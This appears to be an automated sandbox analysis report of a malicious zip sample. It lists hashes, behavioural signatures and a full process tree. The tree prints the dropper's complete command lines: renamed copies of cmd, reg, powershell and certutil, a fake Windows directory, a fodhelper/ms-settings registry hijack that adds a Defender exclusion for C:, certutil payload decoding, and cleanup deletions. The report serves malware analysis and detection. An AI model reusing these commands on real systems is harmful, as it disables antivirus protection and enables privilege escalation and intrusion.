Analysis
-
max time kernel
146s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
09-05-2024 09:58
Static task
static1
Behavioral task
behavioral1
Sample
17168848892.zip
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
17168848892.zip
Resource
win10v2004-20240426-en
General
-
Target
17168848892.zip
-
Size
676KB
-
MD5
21aa22e186d07a35986264f71c3f2908
-
SHA1
ae4a9fb6a15713115c5f68864bbab4c4b2094fd1
-
SHA256
f4906dec2cbdc33af12960aada4dfb76ba22616363fe7fcb26190523ba1cf0f7
-
SHA512
6fc5b97cff11faf1acd29b373067218fd5d202dee7d4cebc887e0ecad8648acd971e2c0487c9677f1aee97c12f13a1f4909667836e04800fee30fe7303598505
-
SSDEEP
12288:YCfKAF6dLivsaQaOLi2PB2hXatDuQJy1tTs2u9bdNfOOY0hkwNzZ:hSAc+vsCAi2p2hKtDuvLzA/hn1Z
Malware Config
Signatures
-
Executes dropped EXE 25 IoCs
pid Process 2992 alpha.exe 3004 alpha.exe 1864 alpha.exe 2496 alpha.exe 2820 alpha.exe 2844 alpha.exe 2248 alpha.exe 2020 xkn.exe 1312 alpha.exe 1236 ger.exe 1808 alpha.exe 2400 kn.exe 2880 alpha.exe 1064 kn.exe 576 alpha.exe 1816 alpha.exe 1224 alpha.exe 780 sppsvc.pif 1756 alpha.exe 1416 alpha.exe 2340 alpha.exe 1668 alpha.exe 2984 alpha.exe 1108 alpha.exe 2928 alpha.exe -
Loads dropped DLL 8 IoCs
pid Process 2540 cmd.exe 2248 alpha.exe 2020 xkn.exe 2020 xkn.exe 1312 alpha.exe 1808 alpha.exe 1648 WerFault.exe 1648 WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1648 780 WerFault.exe 58 -
Kills process with taskkill 1 IoCs
pid Process 688 taskkill.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell\open\command ger.exe Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings ger.exe Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell ger.exe Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell\open ger.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 304 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 780 sppsvc.pif -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2020 xkn.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeRestorePrivilege 2744 7zFM.exe Token: 35 2744 7zFM.exe Token: SeSecurityPrivilege 2744 7zFM.exe Token: SeDebugPrivilege 2020 xkn.exe Token: SeDebugPrivilege 688 taskkill.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2744 7zFM.exe 2744 7zFM.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2540 wrote to memory of 2988 2540 cmd.exe 34 PID 2540 wrote to memory of 2988 2540 cmd.exe 34 PID 2540 wrote to memory of 2988 2540 cmd.exe 34 PID 2540 wrote to memory of 2992 2540 cmd.exe 35 PID 2540 wrote to memory of 2992 2540 cmd.exe 35 PID 2540 wrote to memory of 2992 2540 cmd.exe 35 PID 2540 wrote to memory of 3004 2540 cmd.exe 36 PID 2540 wrote to memory of 3004 2540 cmd.exe 36 PID 2540 wrote to memory of 3004 2540 cmd.exe 36 PID 2540 wrote to memory of 1864 2540 cmd.exe 37 PID 2540 wrote to memory of 1864 2540 cmd.exe 37 PID 2540 wrote to memory of 1864 2540 cmd.exe 37 PID 1864 wrote to memory of 1912 1864 alpha.exe 38 PID 1864 wrote to memory of 1912 1864 alpha.exe 38 PID 1864 wrote to memory of 1912 1864 alpha.exe 38 PID 2540 wrote to memory of 2496 2540 cmd.exe 39 PID 2540 wrote to memory of 2496 2540 cmd.exe 39 PID 2540 wrote to memory of 2496 2540 cmd.exe 39 PID 2496 wrote to memory of 2608 2496 alpha.exe 40 PID 2496 wrote to memory of 2608 2496 alpha.exe 40 PID 2496 wrote to memory of 2608 2496 alpha.exe 40 PID 2540 wrote to memory of 2820 2540 cmd.exe 41 PID 2540 wrote to memory of 2820 2540 cmd.exe 41 PID 2540 wrote to memory of 2820 2540 cmd.exe 41 PID 2820 wrote to memory of 2828 2820 alpha.exe 42 PID 2820 wrote to memory of 2828 2820 alpha.exe 42 PID 2820 wrote to memory of 2828 2820 alpha.exe 42 PID 2540 wrote to memory of 2844 2540 cmd.exe 43 PID 2540 wrote to memory of 2844 2540 cmd.exe 43 PID 2540 wrote to memory of 2844 2540 cmd.exe 43 PID 2844 wrote to memory of 1328 2844 alpha.exe 44 PID 2844 wrote to memory of 1328 2844 alpha.exe 44 PID 2844 wrote to memory of 1328 2844 alpha.exe 44 PID 2540 wrote to memory of 2248 2540 cmd.exe 45 PID 2540 wrote to memory of 2248 2540 cmd.exe 45 PID 2540 wrote to memory of 2248 2540 cmd.exe 45 PID 2248 wrote to memory of 2020 2248 alpha.exe 46 PID 2248 wrote to memory of 2020 2248 alpha.exe 46 PID 2248 wrote to memory of 2020 2248 alpha.exe 46 PID 2020 wrote to memory of 1312 2020 xkn.exe 47 PID 2020 wrote to memory of 1312 2020 xkn.exe 47 PID 2020 wrote to memory of 1312 2020 xkn.exe 47 PID 1312 wrote to memory of 1236 1312 alpha.exe 48 PID 1312 wrote to memory of 1236 1312 alpha.exe 48 PID 1312 wrote to memory of 1236 1312 alpha.exe 48 PID 2540 wrote to memory of 1808 2540 cmd.exe 49 PID 2540 wrote to memory of 1808 2540 cmd.exe 49 PID 2540 wrote to memory of 1808 2540 cmd.exe 49 PID 1808 wrote to memory of 2400 1808 alpha.exe 50 PID 1808 wrote to memory of 2400 1808 alpha.exe 50 PID 1808 wrote to memory of 2400 1808 alpha.exe 50 PID 2540 wrote to memory of 2880 2540 cmd.exe 51 PID 2540 wrote to memory of 2880 2540 cmd.exe 51 PID 2540 wrote to memory of 2880 2540 cmd.exe 51 PID 2880 wrote to memory of 1064 2880 alpha.exe 52 PID 2880 wrote to memory of 1064 2880 alpha.exe 52 PID 2880 wrote to memory of 1064 2880 alpha.exe 52 PID 2540 wrote to memory of 576 2540 cmd.exe 53 PID 2540 wrote to memory of 576 2540 cmd.exe 53 PID 2540 wrote to memory of 576 2540 cmd.exe 53 PID 576 wrote to memory of 688 576 alpha.exe 54 PID 576 wrote to memory of 688 576 alpha.exe 54 PID 576 wrote to memory of 688 576 alpha.exe 54 PID 2540 wrote to memory of 1816 2540 cmd.exe 56
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\17168848892.zip1⤵PID:2188
-
C:\Windows\system32\verclsid.exe"C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x4011⤵PID:3060
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\17168848892.zip"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2744
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\Desktop\397a4ecfc57507ee97921ac4fafcfb3839d6ae7769e57863120b5e03f338a7ec.cmd" "1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵PID:2988
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "2⤵
- Executes dropped EXE
PID:2992
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"2⤵
- Executes dropped EXE
PID:3004
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"3⤵PID:1912
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"3⤵PID:2608
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"3⤵PID:2828
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:1328
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""5⤵
- Executes dropped EXE
- Modifies registry class
PID:1236
-
-
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\Desktop\397a4ecfc57507ee97921ac4fafcfb3839d6ae7769e57863120b5e03f338a7ec.cmd" "C:\\Users\\Public\\sppsvc.rtf" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\Desktop\397a4ecfc57507ee97921ac4fafcfb3839d6ae7769e57863120b5e03f338a7ec.cmd" "C:\\Users\\Public\\sppsvc.rtf" 93⤵
- Executes dropped EXE
PID:2400
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 123⤵
- Executes dropped EXE
PID:1064
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:688
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 22⤵
- Executes dropped EXE
PID:1816 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 23⤵
- Runs ping.exe
PID:304
-
-
-
C:\Users\Public\Libraries\sppsvc.pifC:\Users\Public\Libraries\sppsvc.pif2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:780 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 6763⤵
- Loads dropped DLL
- Program crash
PID:1648
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"2⤵
- Executes dropped EXE
PID:1224
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"2⤵
- Executes dropped EXE
PID:1756
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"2⤵
- Executes dropped EXE
PID:1416
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2340
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1668
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2984
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\sppsvc.rtf" / A / F / Q / S2⤵
- Executes dropped EXE
PID:1108
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2928
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.4MB
MD5b7d01eac3c560a510c573c4c99da95a5
SHA18129e8b1b26ffc249994b6272cbc14ffdd907d94
SHA256397a4ecfc57507ee97921ac4fafcfb3839d6ae7769e57863120b5e03f338a7ec
SHA512a1d93c930dc91b99ebc3398ede4f260b17b65df5a958eee1dcc3b78495c4f24bb04bae722d45d5cbb3fa76ecc728b0fdc2b2d4a42fc64618e23d452dab1b7a4f
-
Filesize
819KB
MD56b8ff68a24697a15ac47255207740d9d
SHA1db01dd1c00c213e8dd2b62bd4670fd0da71a6189
SHA25695d6067492b2c592622a88ce2c35a8d7ff5e35ec94eb59decffc74d1ecae6e09
SHA5121e569ef7337bffafb361a7e61bcc5e782e32746ba46153da900574d60b50a7941e55c540d89deeb2f758be2dcc04d41fd97fbad1564606169c25c231d05f3089
-
Filesize
73KB
MD59d0b3066fe3d1fd345e86bc7bcced9e4
SHA1e05984a6671fcfecbc465e613d72d42bda35fd90
SHA2564e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
SHA512d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119
-
Filesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
Filesize
1.6MB
MD53cc0ffd10c8bacf6f9b68a17da21be8c
SHA135bad683b83eb60e459d4c81aec3bd6a62f849b1
SHA256fadcab4e7cbf88e1173681625c7f3414e0faad45a11a90f5785d1304c55a8049
SHA51252135b3ac29dfd48be9fa8ef95adb88807d09c57b666c7cb2e48661e07e5c9c99acf9fa6368c82fbd5bfd5b20fb816171745236fa200925a7cad8deaed15d27a
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d